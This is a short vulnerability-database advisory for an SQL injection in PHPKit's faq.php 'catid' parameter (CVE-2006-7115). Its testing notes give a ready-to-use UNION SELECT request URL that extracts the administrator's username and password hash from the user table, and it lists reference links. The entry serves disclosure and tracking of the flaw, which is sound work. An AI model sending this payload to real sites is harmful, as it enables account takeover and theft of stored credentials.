PHPKit faq.php catid Variable SQL Injection

2006-11-10T18:45:22
ID OSVDB:31265
Type osvdb
Reporter OSVDB
Modified 2006-11-10T18:45:22

Description

Manual Testing Notes

/include.php?path=faq/faq.php&catid=-1\'%20UNION%20SELECT%201,2,3,4,user_name,user_pw,7,8,9,10,11,12,13%20FROM%20phpkit_user%20where%20%20user_id=1%20and%20\'1\'=\'1

References:

Vendor URL: http://www.phpkit.de/ Secunia Advisory ID:17479 Other Advisory URL: http://www.bb-pcsecurity.de/websecurity/532/org/PHPKit_1.6.1_RC2_(faq-faq.php)_Remote_SQL_Injection_Exploit.htm Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-11/0167.html ISS X-Force ID: 30209 CVE-2006-7115 Bugtraq ID: 21002